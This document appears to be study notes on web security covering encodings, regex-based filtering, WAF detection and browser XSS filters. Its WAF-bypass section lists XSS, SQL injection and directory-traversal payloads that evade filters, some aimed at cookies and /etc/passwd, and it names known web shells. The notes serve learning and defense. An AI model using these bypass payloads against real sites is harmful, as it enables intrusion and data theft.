Data Encoding Basics
URL encoding
This table is a character encoding chart that is useful in explaining which characters are “safe” and which characters should be encoded in URLs.
- http://perishablepress.com/stop-using-unsafe-characters-in-urls/
Some commonly encoded characters are:
Character | Purpose in URL | Encoding |
'#' | Separate anchors | %23 |
'?' | Separate query string | %3F |
'&' | Separate query elements | %26 |
'%' | Indicates an encoded character | %25 |
'/' | Separate domain and directories | %2F |
'+' | Indicates a space | %2B |
' ' | Not recommended | %20 or + |
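A minimal sketch of how the characters in the table are percent-encoded in practice, using the built-in encodeURIComponent and decodeURIComponent functions. The sample query value is a made-up illustration, not something from the referenced chart.

```javascript
// Characters from the table above, with the space as the last entry.
const reserved = ['#', '?', '&', '%', '/', '+', ' '];

// encodeURIComponent percent-encodes each of them when used inside a component.
function encodeAll(chars) {
  return chars.map((ch) => encodeURIComponent(ch));
}

// Hypothetical query value that mixes several reserved characters.
const value = 'a&b=c/d?e#f 100%+';
const safe = encodeURIComponent(value);

console.log(encodeAll(reserved).join(' '));
console.log(safe);
console.log(decodeURIComponent(safe) === value);
```

Note that encodeURIComponent always emits %20 for a space; the + form is only used by form-style (application/x-www-form-urlencoded) encoders.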
HTML encoding
Documents transmitted via HTTP can send a charset parameter in the header to specify the character encoding of the document sent. This is the HTTP header: Content-Type
Content-Type:text/html;charset=utf-8
Define character encoding using HTTP
# PHP > Uses the header() function to send a raw HTTP header:
header('Content-Type:text/html;charset=utf-8');
# ASP.Net > Uses the response object:
<%Response.charset="utf-8"%>
# JSP > Uses the page directive:
<%@ page contentType="text/html; charset=UTF-8"%>
# Using directive META:
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
# With HTML5, it is also possible to write:
<meta charset="utf-8">
HTML4 and HTML5 specifications about special characters
http://www.w3.org/TR/1998/REC-html40-19980424/charset.html#h-5.3
http://www.w3.org/TR/html5/single-page.html#character-references
- Named characters references:
→ http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references#Character_entity_references_in_HTML
Character references must start with a U+0026 AMPERSAND character (&):
Character Reference | Rule | Encoded character |
Named entity | & + named character reference + ; | &lt; |
Numeric Decimal | & + # + decimal code point + ; | &#60; |
Numeric Hexadecimal | & + #x + hexadecimal code point + ; | &#x3c; / &#X3C; |
Some Variations:
Character Reference | Variation | Encoded character |
Numeric Decimal | No terminator (;) | &#60 |
Numeric Decimal | One or more zeroes before code | &#060; / &#0000060; |
Numeric Hexadecimal | No terminator (;) | &#x3c |
Numeric Hexadecimal | One or more zeroes before code | &#x03c; / &#x000003c; |
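The numeric forms and their variations can be explored with a short sketch. Both helper names (numericReferences, decodeNumericReferences) are hypothetical, and the decoder is a simplified regex, not a full HTML parser: it only illustrates that leading zeroes and a missing terminator still resolve to the same character.

```javascript
// Build the decimal and hexadecimal references for a single character.
function numericReferences(ch) {
  const codePoint = ch.codePointAt(0);
  return {
    decimal: `&#${codePoint};`,
    hex: `&#x${codePoint.toString(16)};`,
  };
}

// Decode numeric references, tolerating leading zeroes and a missing ';'.
// Simplified on purpose: no named entities, no range checks.
function decodeNumericReferences(text) {
  return text.replace(
    /&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?/g,
    (match, hex, dec) =>
      String.fromCodePoint(hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10))
  );
}

console.log(numericReferences('<'));
console.log(decodeNumericReferences('&#60 &#0060; &#x3c &#X003C;'));
```

A filter that only looks for the canonical form of a reference will miss the variations that the decoder above still accepts.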
Base (36|64) encoding
Base 36 Encoding Scheme
Base36 - It's the most compact, case-insensitive, alphanumeric system using ASCII characters. In fact, the scheme's alphabet contains all digits [0-9] and Latin letters [A-Z].
It's used in many real-world scenarios:
- Reddit uses it for identifying both posts and comments.
- Some URL shortening services like TinyURL use Base36 integers as compact, alphanumeric identifiers.
→ http://tinyurl/ljasd
PHP
PHP uses the base_convert() function to convert numbers:
OHPE in Base 10 is <?=base_convert("OHPE",36,10);?>
JavaScript
JavaScript uses two functions:
(1142690).toString(36) // encode
1142690..toString(36) // encode (alternative syntax)
parseInt("ohpe",36) // decode
Base64 Encoding Scheme
Base64 is one of the most widespread binary-to-text encoding schemes to date. It was designed to allow binary data to be represented as ASCII string text.
- The alphabet of the Base64 encoding scheme is composed of digits [0-9] and Latin letters, both upper and lower case [a-zA-Z], for a total of 62 values. To complete the character set to 64 there are the plus (+) and slash (/) characters.
- Moreover: http://en.wikipedia.org/wiki/Base64#Implementations_and_history
The algorithm divides the message into groups of 6 bits and then converts each group into the respective ASCII character, following the conversion table.
That's why the allowed characters are 64 (2 raised to the 6th power = 64).
- The output is built in blocks of four characters (24 bits, or 3 input bytes). If the last block is missing one 6-bit group, the missing group is encoded as =
- If the last block is missing two groups, they are encoded as ==
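The grouping and padding steps can be sketched by hand. This is an illustrative implementation under the assumption of UTF-8 input, with hypothetical names (ALPHABET, base64Encode); real code should use the native functions.

```javascript
// Standard Base64 alphabet: A-Z, a-z, 0-9, '+' and '/'.
const ALPHABET =
  'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

function base64Encode(text) {
  // Turn the input into one long bit string, 8 bits per byte.
  const bytes = new TextEncoder().encode(text);
  let bits = '';
  for (const byte of bytes) bits += byte.toString(2).padStart(8, '0');

  // Pad with zero bits so the string splits evenly into 6-bit groups.
  while (bits.length % 6 !== 0) bits += '0';

  // Map each 6-bit group to its character in the alphabet.
  let out = '';
  for (let i = 0; i < bits.length; i += 6) {
    out += ALPHABET[parseInt(bits.slice(i, i + 6), 2)];
  }

  // Complete the last 4-character block with '='.
  while (out.length % 4 !== 0) out += '=';
  return out;
}

console.log(base64Encode('encode this string'));
console.log(base64Encode('a'), base64Encode('ab'), base64Encode('abc'));
```

Inputs of 1, 2 and 3 bytes show the three padding cases: two =, one =, and none.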
PHP
PHP uses the base64_encode and base64_decode functions, based on the MIME Base64 implementation:
<?=base64_encode('encode this string')?> //encode
<?=base64_decode('ZW5jb2RlIHRoaXMgc3RyaW5n')?> //decode
JavaScript
Many browsers can handle Base64 natively through the btoa and atob functions:
window.btoa('encode this string'); //encode
window.atob('ZW5jb2RlIHRoaXMgc3RyaW5n'); //decode
Moreover: https://developer.mozilla.org/en-US/docs/Web/API/Window.btoa
Unicode encoding
Unicode, also known as the ISO/IEC 10646 Universal Character Set. The way applications handle it can expose them to security attacks, such as filter bypasses.
- http://www.joelonsoftware.com/articles/Unicode.html
UTF = Unicode Transformation Format:
- UTF-8
- UTF-16
- UTF-32
Homoglyph | Visual Spoofing
In typography, a homoglyph is one of two or more characters, or glyphs, with shapes that either appear identical or cannot be differentiated by quick visual inspection. -Wikipedia
Homograph - a word that looks the same as another word
Homoglyph - a look-alike character used to create homographs
Example:
Visual Sp'oo'fing = U+006F (Latin small letter o)
U+03BF (Greek small letter omicron)
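A short sketch of the example above: two strings that render almost identically but compare as different. The helper name codePoints and the sample word are illustrative choices; the script check relies on Unicode property escapes, which need the u flag.

```javascript
const latin = 'spoofing';           // both 'o' are U+006F
const mixed = 'sp\u03BF\u03BFfing'; // both 'o' replaced by U+03BF (omicron)

// List the code point of every character in a string.
function codePoints(text) {
  return Array.from(text, (ch) =>
    'U+' + ch.codePointAt(0).toString(16).toUpperCase().padStart(4, '0')
  );
}

// Flag strings that contain Greek letters.
const hasGreek = (text) => /\p{Script=Greek}/u.test(text);

console.log(latin === mixed);
console.log(codePoints(mixed).join(' '));
console.log(hasGreek(latin), hasGreek(mixed));
```

Checking for mixed scripts like this is one simple way to spot a spoofed identifier, although it is far from a complete defense.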
Moreover Confusables: http://unicode.org/cldr/utility/confusables.jsp
Homoglyph Attack Generator: http://www.irongeek.com/homoglyph-attack-generator.php
Article about Homoglyph and Punycode attacks: http://www.irongeek.com/i.php?page=security/out-of-character-use-of-punycode-and-homoglyph-attacks-to-obfuscate-urls-for-phishing
They can bypass anti cross-site scripting and SQL injection filters.
- Creative usernames and Spotify account hijacking: http://labs.spotify.com/2013/06/18/creative-usernames/
There are other ways in which characters and strings can be transformed by software processes, such as normalization, canonicalization, best fit mapping, etc.
→ Moreover: http://websec.github.io/unicode-security-guide/
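As an illustration of the normalization case, the sketch below shows how a compatibility normalization (NFKC) applied after a filter can turn harmless-looking fullwidth characters into markup. The filter function is a hypothetical, deliberately naive check.

```javascript
// Fullwidth less-than (U+FF1C) and greater-than (U+FF1E) signs.
const input = '\uFF1Cscript\uFF1E';

// Hypothetical naive filter: rejects anything containing '<'.
const naiveFilterBlocks = (text) => text.includes('<');

// A later processing step normalizes the string.
const normalized = input.normalize('NFKC');

console.log(naiveFilterBlocks(input));      // checked before normalization
console.log(normalized);
console.log(naiveFilterBlocks(normalized)); // checked after normalization
```

The order of operations is the point: filtering before normalizing lets the transformed characters through.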
Extra Resources
- http://unicode.org/cldr/utility/
- http://codepoints.net/
- http://txtn.us/
- http://www.panix.com/~eli/unicode/convert.cgi
Multiple (De|En) Codings
- It's common to abuse multiple encodings to bypass security measures
URL-Encoding > URL
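A minimal sketch of the idea with double URL encoding, assuming a hypothetical setup where a filter decodes the input once and the application decodes it a second time.

```javascript
const payload = '<script>';

// Encode twice: the '%' signs of the first pass get encoded again.
const once = encodeURIComponent(payload);
const twice = encodeURIComponent(once);

// Hypothetical filter: decodes once, then looks for '<'.
const seenByFilter = decodeURIComponent(twice);
const filterBlocks = seenByFilter.includes('<');

// Hypothetical application: decodes what the filter let through.
const seenByApp = decodeURIComponent(seenByFilter);

console.log(once, twice);
console.log(filterBlocks, seenByApp);
```

The filter and the application disagree on how many times to decode, and the payload only appears after the second pass.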
Filtering Basics
A common and often recommended best practice to protect web applications against malicious attacks is the use of specific input filtering and output encoding controls.
These kinds of controls may range from naive blacklists to sophisticated and highly restrictive whitelists. What about in the real world? We are somewhere in the middle!
- Controls can be implemented at different layers in a web application. They can be provided as libraries and APIs, in the best case written by internal specialists or external organizations, like ESAPI by OWASP.
- https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
- Security Controls are also inside most common browsers.
Generally, these solutions fall into the IDS and IPS world, but for web applications the most common choice is the Web Application Firewall (WAF).
A free and open source solution: http://www.modsecurity.org/
Regular Expressions (RE or RegEx)
- Regular expressions are the standard way to define filter rules. Mastering RegEx is fundamental to understanding how to bypass filters, because REs are extremely powerful.
- A regular expression is a special sequence of characters used for describing a search pattern.
→ regular expression = regex
→ pattern matched = match
Two main types
- DFA = http://en.wikipedia.org/wiki/Deterministic_finite_automaton
- NFA = http://en.wikipedia.org/wiki/Nondeterministic_finite_automaton
Engine | Program |
DFA | awk, egrep, MySQL, Procmail |
NFA | .NET languages, Java, Perl, PHP, Python, Ruby, PCRE library, vi, grep, less, more |
Comparison of regular expression engines: http://en.wikipedia.org/wiki/Comparison_of_regular_expression_engines
Regular Expression Flavor Comparison: http://www.regular-expressions.info/refflavors.html
Non-printing characters:
They are used to evade weak filters and obfuscate the payload.
Match Unicode Code Point:
Regular expression flavors that work with Unicode use specific meta-sequences to match code points.
The sequence is \ucode-point, where code-point is the hexadecimal number of the character to match.
There are regex flavors like PCRE that do not support the former notation,
but use an alternative sequence \x{code-point} in its place.
example:
\u2603 = the snowman character in .NET, Java, JavaScript and Python
\x{2603} = the snowman character in Apache and PHP (PCRE library)
Meta-sequence Quality:
\p{quality-id} = have a specific quality
\P{quality-id} = do not have quality
Match Unicode Category:
# To match a letter in any of the case variations (lower, upper and title), this regex does the job:
[\p{Ll}\p{Lu}\p{Lt}]
# As a shorthand, some regex flavors implement this solution:
\p{L&}
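The meta-sequences above can be tried in JavaScript, with the caveat that property escapes such as \p{Ll} only work when the regex carries the u flag. The variable names are illustrative, and the \p{L&} shorthand is left out because it is flavor-specific.

```javascript
// Code point match: \uXXXX works without flags, \u{...} needs the u flag.
const snowman = /\u2603/;
const snowmanBraces = /\u{2603}/u;

// Category match: lowercase, uppercase and titlecase letters only.
const anyCaseLetters = /^[\p{Ll}\p{Lu}\p{Lt}]+$/u;

// Negated quality: at least one character that is not a letter.
const hasNonLetter = /\P{L}/u;

console.log(snowman.test('\u2603'), snowmanBraces.test('\u2603'));
// U+01C5 is a titlecase letter (category Lt).
console.log(anyCaseLetters.test('aB\u01C5'), anyCaseLetters.test('a1'));
console.log(hasNonLetter.test('abc'), hasNonLetter.test('ab1'));
```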
Web Application Firewall - WAF
Bypass WAFs
|-| = instead of using this
|→| = the best choice is
Cross-Site Scripting:
- alert('xss')
- alert(1)
→ prompt('xss')
→ prompt(8)
→ confirm('xss')
→ confirm(8)
→ alert(/xss/.source)
→ window[/alert/.source](8)
- alert(document.cookie)
→ with(document)alert(cookie)
→ alert(document['cookie'])
→ alert(document[/cookie/.source])
→ alert(document[/coo/.source+/kie/.source])
- <img src=x onerror=alert(1);>
→ <svg/onload=alert(1)>
→ <video src=x onerror=alert(1);>
→ <audio src=x onerror=alert(1);>
- javascript:alert(document.cookie)
→ data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
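To see why the alternatives slip through, here is a sketch that runs a few of the payloads above, as plain strings, against two hypothetical blacklist patterns. The patterns are invented for illustration and do not represent any real WAF rule set; nothing is executed.

```javascript
// Hypothetical blacklist rules.
const patterns = [/alert\s*\(/, /document\.cookie/];

// A payload is blocked when any rule matches it.
function isBlocked(payload) {
  return patterns.some((pattern) => pattern.test(payload));
}

const payloads = [
  'alert(1)',
  'alert(document.cookie)',
  'prompt(8)',
  'window[/alert/.source](8)',
];

for (const payload of payloads) {
  console.log(payload, isBlocked(payload) ? 'blocked' : 'passes');
}

// The regex-literal trick rebuilds the filtered keywords at runtime.
console.log(/alert/.source, /coo/.source + /kie/.source);
```

The .source property of a regex literal returns its pattern text, so the keyword never appears in the form the rule expects.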
Blind SQL Injection
- 'or 1=1 '
- 'or 6=6 '
→ 'or 0x47=0x47 '
- or char(32)=''
→ or 6 is not null
SQL Injection
- UNION SELECT
→ UNION ALL SELECT
Directory Traversal
- /etc/passwd
→ /too/../etc/far/../passwd
→ /etc//passwd
→ /etc/ignore/../passwd
→ /etc/passwd........
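The first three variants work because the target resolves them to the same file. A sketch with a hypothetical substring filter and a simplified path normalizer (absolute POSIX-style paths only; the trailing-dots variant depends on platform behavior and is not modeled here):

```javascript
// Hypothetical naive filter: blocks the literal path only.
const naiveFilterBlocks = (path) => path.includes('/etc/passwd');

// Simplified normalizer: drops empty and '.' segments, resolves '..'.
function normalizePath(path) {
  const out = [];
  for (const segment of path.split('/')) {
    if (segment === '' || segment === '.') continue;
    if (segment === '..') out.pop();
    else out.push(segment);
  }
  return '/' + out.join('/');
}

const variants = [
  '/too/../etc/far/../passwd',
  '/etc//passwd',
  '/etc/ignore/../passwd',
];

for (const variant of variants) {
  console.log(variant, naiveFilterBlocks(variant), normalizePath(variant));
}
```

Each variant passes the substring check, yet normalizes to the path the filter was meant to protect.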
Web Shell
- c99.php
- r57.php
- shell.aspx
- cmd.jsp
- CmdAsp.asp
→ augh.php
Detection and Fingerprinting
Cookie Values
- Citrix Netscaler uses some different cookies in the HTTP responses like ns_af or citrix_ns_id or NSC_
- F5 BIG-IP ASM (Application Security Manager) uses cookies starting with TS and followed by a string that matches the following regex:
^TS[a-zA-Z0-9]{3,6}
- Barracuda uses two cookies: barra_counter_session and BNI__BARRACUDA_LB_COOKIE
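The cookie hints above can be turned into a small lookup. This is a sketch with hypothetical names (signatures, guessWaf); the patterns are adapted from the list, with the Citrix names treated as prefixes and the F5 character class written as [a-zA-Z0-9]. A match is only a hint, not proof that the product is present.

```javascript
// Cookie-name signatures derived from the notes above.
const signatures = [
  { waf: 'Citrix Netscaler', pattern: /^(ns_af|citrix_ns_id|NSC_)/ },
  { waf: 'F5 BIG-IP ASM', pattern: /^TS[a-zA-Z0-9]{3,6}/ },
  { waf: 'Barracuda', pattern: /^(barra_counter_session|BNI__BARRACUDA_LB_COOKIE)$/ },
];

// Return the products whose signature matches at least one cookie name.
function guessWaf(cookieNames) {
  return signatures
    .filter(({ pattern }) => cookieNames.some((name) => pattern.test(name)))
    .map(({ waf }) => waf);
}

// Made-up cookie names for illustration.
console.log(guessWaf(['TS01a2b3', 'sessionid']));
console.log(guessWaf(['NSC_abc', 'barra_counter_session']));
console.log(guessWaf(['PHPSESSID']));
```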
Header Rewrite
Some WAFs rewrite the HTTP headers. Usually these modify the Server Header to deceive the attackers.
HTTP Response Code
Some WAFs modify the HTTP response codes if the request is hostile; for example:
- mod_security > 406 Not Acceptable
- AQTRONIX WebKnight > 999 No Hacking
HTTP Response Body
It's also possible to detect a WAF from the response body.
Example:
<body> | <body> |
…Mod_Security… | …AQTRONIX WebKnight… |
</body> | </body> |
dotDefender Blocked your Request
Close Connection
Some WAFs drop the connection when they detect a malicious request:
- mod_security
Detect WAF
wafw00f is a tool written in Python that can detect up to 20 different WAF products
- wafw00f
- https://code.google.com/p/waffit/
The techniques used to detect a WAF are similar to those we have seen previously:
- Cookies
- Server Cloaking
- Response Codes
- Drop Action
- Pre-Built-in Rules
- Nmap contains a script that tries to detect the presence of a web application firewall, its type and version. http://nmap.org/nsedoc/scripts/http-waf-fingerprint.html
→ nmap --script=http-waf-fingerprint <target>
- imperva-detect = https://code.google.com/p/imperva-detect/
Client-Side Filters
Browsers are the primary means used to address client-side attacks
Browser Add-ons
NoScript Security Suite is a whitelist-based security tool that basically disables all the executable web content (Javascript, Java, Flash, Silverlight, …) and lets the user choose which sites are trusted, thus allowing the use of these technologies.
→ https://addons.mozilla.org/en-US/firefox/addon/noscript/
- http://noscript.net/features#xss is an effective browser-based solution to prevent targeted malicious web attacks.
XSS Filter (IE)
The filter rules are stored in the c:\windows\system32\mshtml.dll library. Ways to inspect them:
# Hex editors like WinHex, or Notepad++ with the TextFX plugin
# IDA Pro
# MS-DOS commands
findstr /C:"sc{r}" \WINDOWS\SYSTEM32\mshtml.dll | find "{"
> savepath // you can redirect the output to a file for more readable results
Neutering in Action
Basically, once a malicious injection is detected, the XSS Filter modifies the evil part of the payload by putting the '#' character in place of the neuter character defined in the rules.
evil > ev{i}l > ev#l
<svg/onload=alert(1)> = <svg/#nload=alert(1)>
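The neutering step can be mimicked with a toy function. This is only a sketch: the real rules are more complex patterns, while here a rule is assumed to be a literal string with exactly one character wrapped in braces, and both the neuter helper and the '{o}nload' rule are hypothetical.

```javascript
// Replace every occurrence of the rule's literal text with a copy in which
// the brace-marked (neuter) character is swapped for '#'.
function neuter(input, rule) {
  const index = rule.indexOf('{');           // position of the neuter character
  const literal = rule.replace(/[{}]/g, ''); // rule text without the braces
  const neutered = literal.slice(0, index) + '#' + literal.slice(index + 1);
  return input.split(literal).join(neutered);
}

console.log(neuter('evil', 'ev{i}l'));
console.log(neuter('<svg/onload=alert(1)>', '{o}nload'));
```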
Web sites that choose to opt out of this protection can use the HTTP response header:
X-XSS-Protection: 0
X-XSS-Protection: 1; mode=block // instead of sanitizing the page, the browser renders a simple #
# Other browsers, like Safari, use the same scheme
XSS Auditor - WebKit/Blink
- http://www.adambarth.com/papers/2010/bates-barth-jackson.pdf
- enabled by default in browsers such as Chrome, Opera and Safari
The filter analyzes both the inbound requests and the outbound responses. If, in the parsed HTML data, it finds executable code within the response, then it stops the script and generates a console alert similar to the following:
The XSS Auditor refused to execute a script in …
However, there are a lot of bypasses as well.